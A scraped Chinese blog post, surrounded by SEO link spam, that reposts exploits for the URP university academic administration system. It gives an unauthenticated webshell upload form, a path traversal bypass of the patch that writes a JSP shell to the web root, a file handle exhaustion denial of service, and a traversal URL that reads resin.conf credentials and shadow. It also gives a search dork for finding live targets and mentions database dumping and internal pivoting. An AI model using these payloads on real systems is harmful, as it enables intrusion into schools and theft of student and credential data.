当前位置: 首页 > news >正文

深圳网站建设团队如何给网站做推广

深圳网站建设团队,如何给网站做推广,上海装修公司排名49,如何编辑网页在学校上了这么长时间,由于对课表选课的不习惯,就逐渐产生了对教务系统简单的了解,希望可以以此学习 本次测试版本: 参考:https://www.secpulse.com/archives/26974.html 漏洞类型 文件上传导致任意代码执行 直接PO…

在学校上了这么长时间,由于对课表选课的不习惯,就逐渐产生了对教务系统简单的了解,希望可以以此学习

本次测试版本:

 

参考:https://www.secpulse.com/archives/26974.html

漏洞类型

文件上传导致任意代码执行

 

 

直接POST数据过去  对lwUpLoad_action.jsp这个页面

开始分析:

首先,这个系统使用了Smartupload组件,先来看下lwUpLoad_action的部分源码。

<script language="javaScript" type="">//转向function doAction(type){document.forms[0].action="uploadLwywAction.do?actionType=upload&returnStr="+type;//alert(document.forms[0].action);document.forms[0].submit();}</script>
</head>
<body>
<form  method="post" action="/uploadLwywAction" >
<%SmartUpload  mySmartUpload = new SmartUpload();mySmartUpload.initialize(pageContext);mySmartUpload.upload(); //int fileSize=mySmartUpload.getSize();File file=mySmartUpload.getFiles().getFile(0);Request req=mySmartUpload.getRequest();//扩展名String fileExt=file.getFileExt();String realPath=request.getRealPath("/lwUpLoadTemp");String fileName=req.getParameter("xh")+"."+fileExt;String filePath=realPath+"/"+fileName;if(!file.isMissing()){file.saveAs("/lwUpLoadTemp/"+fileName,mySmartUpload.SAVE_VIRTUAL);}String returnStr=TestBean.uploadLwyw(filePath,req);//根据返回值 判断操作if(returnStr.equals("yes")){%><input type="hidden" name="zxjxjhh" value="<%=req.getParameter("zxjxjhh") %>"><input type="hidden" name="tmbh" value="<%=req.getParameter("tmbh") %>"><input type="hidden" name="xh" value="<%=req.getParameter("xh") %>"><script type="text/javascript">doAction("yes")</script><%}else if(returnStr.equals("full")){%><script type="text/javascript">doAction("full")</script><%}else {%><script type="text/javascript">doAction("error")</script><%}%>

初步一看这个代码没啥问题吧,这个文件名使用学号命名的,也符合正常逻辑..继续看这个uploadlwyw.jsp的一部分代码,

function doUpload(){var chooseFile = null;var chooseFileType = null;//选择的文件类型var uploadlwyw = document.uploadLwywForm.theFile.value;var pos = uploadlwyw.lastIndexOf(".");var uploadlwywType = uploadlwyw.substring(pos + 1,uploadlwyw.length);//上传文件的类型if(uploadlwywType.toLowerCase()=="docx"){uploadlwywType = "doc";}//得到用户选择的文件类型for(var i=0;i<3;i++){if(document.uploadLwywForm.wjlx[i].checked){chooseFileType = document.uploadLwywForm.wjlx[i].value;if(chooseFileType == "doc"){chooseFile = "word";}if(chooseFileType == "pdf"){chooseFile = "pdf";}if(chooseFileType == "zip"){chooseFile = "latex";}}}//与上传的文件类型比较if(uploadlwywType.toLowerCase() != chooseFileType){alert("论文原文请上传" + chooseFile + "类型的文件!");return false;}if(document.uploadLwywForm.lwywwbb.value == "" && chooseFile == "word"){//版本判断alert("提交word类型的论文原文需添版本号!");document.uploadLwywForm.lwywwbb.focus();return false;}document.uploadLwywForm.action="lwUpLoad_action.jsp";document.uploadLwywForm.submit();}//改变上传文件类型function doChange(type){if(type != "word"){document.uploadLwywForm.lwywwbb.value ="";document.uploadLwywForm.lwywwbb.disabled = true;}else{document.uploadLwywForm.lwywwbb.disabled = false;}}

这你妹这么重要的上传用js写不是打脸吗.    ( js上传都写在后端,但是在这里就非常容易绕过前端js )

..在这里也没有限制上传类型,当然还得看后端的处理,别急,马上就来

看下UploadLwywAction  这是个java字节码,需要反编译成java源码  上传部分代码如下

String action = httpServletRequest.getParameter("actionType");if (action.equals("upload"))return upload(actionMapping, actionForm, httpServletRequest, httpServletResponse);public ActionForward upload(ActionMapping actionMapping, ActionForm actionForm, HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse){UploadLwywForm form;UploadLwywForm uploadLwywActionForm = (UploadLwywForm)actionForm;HttpSession session = httpServletRequest.getSession(false);UserInforVO userInfor = (UserInforVO)session.getAttribute("userInfor");form = (UploadLwywForm)actionForm;if (isSuccess.equals("yes")){String zxjxjhh = form.getZxjxjhh();String tmbh = form.getTmbh();String xh = form.getXh();LwLwxxbId lwLwxxbId = new LwLwxxbId(new LwXtb(new LwXtbId(new LwTmxxb(new LwTmxxbId(zxjxjhh, tmbh)), xh)));LwLwxxbLogic lwLwxxbLogic = new LwLwxxbLogic();LwLwxxb lwLwxxb = lwLwxxbLogic.getLwxxb(lwLwxxbId);}

后端也没有处理   那就是没有限制了

这样这不是个任意文件上传吗...自己写个表单就好了...

<form action="http://x.x.x.x/lwUpLoad_action.jsp" method="post" enctype="multipart/form-data" ><input type="file" name="theFile" id="File"/><input type="text" name="xh" id="context"/><input type="submit" value="show me the shell" ></form>

下面属于脱裤脚翘:

首先用这个表单上传一个shell

ssh反代会用,反代配全局继续内网渗透


参考:http://www.hackpanda.com/archives/212

漏洞类型

URP教务系统拒绝服务

 

 

新补丁更新了几个filter,还有web根目录下的fileError.jsp存在这个文件的urp就存在这个拒绝服务,不存在这个文件的大部分可以getshell

Properties prop = new Properties();java.io.InputStream in = getClass().getResourceAsStream("/uploadfileFomat.properties");try{prop.load(in);}catch (IOException e1){System.out.println("获取允许文件类型出错");e1.printStackTrace();}String fomat = prop.getProperty("uploadfileFomat");

读取properties后没有关闭文件句柄

通过burp多次访问后

然后主站整个404并且必须重启resin才能恢复通过lsof可以看到java的文件句柄已经达到800+

 

 


参考:http://www.hackpanda.com/archives/212

漏洞类型

补丁绕过&&继续无需登录GETSHELL

升级的时候又把picFile那个过滤漏了

直接看下代码吧,主要还是在第一法getshell那里分析的多

String fileExt=file.getFileExt();String realPath=request.getRealPath("/lwUpLoadTemp");String fileName=req.getParameter("xh")+"."+fileExt;String filePath=realPath+"/"+fileName;if(!file.isMissing()){file.saveAs("/lwUpLoadTemp/"+fileName,mySmartUpload.SAVE_VIRTUAL); //fileName}String returnStr=TestBean.uploadLwyw(filePath,req);

上段代码中fileName是doPost过来的,在这里没有过滤跨目录符号 ../ 所以还是用之前的表单即可完成上传 也就是

code 区域

file.saveAs("/lwUpLoadTemp/../sss.jsp")

这样绕开了补丁限制,在根目录生成一个shell


参考:http://www.hackpanda.com/archives/212

漏洞类型

轻易读取数据库连接信息

漏洞实际是不需要登录的,而且可以轻易读取数据库连接信息,还有shadow,这就是这个漏洞的真正危害所在。

public void service(HttpServletRequest req, HttpServletResponse res){BufferedReader br;PrintWriter pw;br = null;pw = null;res.setContentType("text/html;charset=GBK");pw = res.getWriter();String filename = req.getParameter("file"); //直接取得filebr = new BufferedReader(new InputStreamReader(getClass().getResourceAsStream(filename), "GBK"));String s;while ((s = br.readLine()) != null)pw.print(s + "\n");Exception e;

构造http://x.x.x.x/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf

特征为 intitle:urp综合教务系统-登录

shadow

 

以上就是对urp系统的利用,转自panda博客,

以上仅供学习参考,严禁触犯法律法规 

http://www.tj-hxxt.cn/news/70879.html

相关文章:

  • 建筑网站的功能模块有哪些最新网络营销方式有哪些
  • 北京公司网站如何制作郑州seo顾问阿亮
  • 上海企业建站提供商网站营销网
  • 小程序自己做网站百度推广代理公司
  • php网站分类目录程序 网址导航程序 织梦二次开发他达拉非的副作用和危害
  • 企业做网站带来的好处电商推广和网络推广的区别
  • 做网站实习日志查询关键词网站
  • 北京在建项目查询seo搜索引擎优化包邮
  • asp.net做的小网站某网站seo诊断分析
  • 免费网站制作新闻友情链接的定义
  • 印刷企业网站模板太原seo排名优化软件
  • 网站建设与设计开题报告怎么开通百度推广账号
  • 企业网站设计公司seo点击排名器
  • pc网站做移动适配西安百度关键词包年
  • 如何建立新的企业网站白城seo
  • 平台网站怎么建设社区推广
  • 基于搜索引擎的网站推广方式seo实战培训
  • 郴州做网站的公司宣传推广
  • 如何在阿里云上做网站中国seo网站
  • 网站开发的教学网站新闻头条最新消息摘抄
  • 东莞销售网站公司哪家好互联网营销策划方案
  • 怎样自学做网站需要多少钱网站友情链接的好处
  • 高端品牌网站设计张雷明任河南省委常委
  • 做网站给客户聊天记录2021年关键词排名
  • 个人网站有哪些板块建站公司排名
  • 网站推广新手教程全面落实疫情防控优化措施
  • 可以免费做3dLOGO的网站百度站长工具官网
  • 浙江台州网站制作seo关键词优化经验技巧
  • 更换wordpress后台登陆地址上海搜索seo
  • 太原企业网站模板建站百度seo策略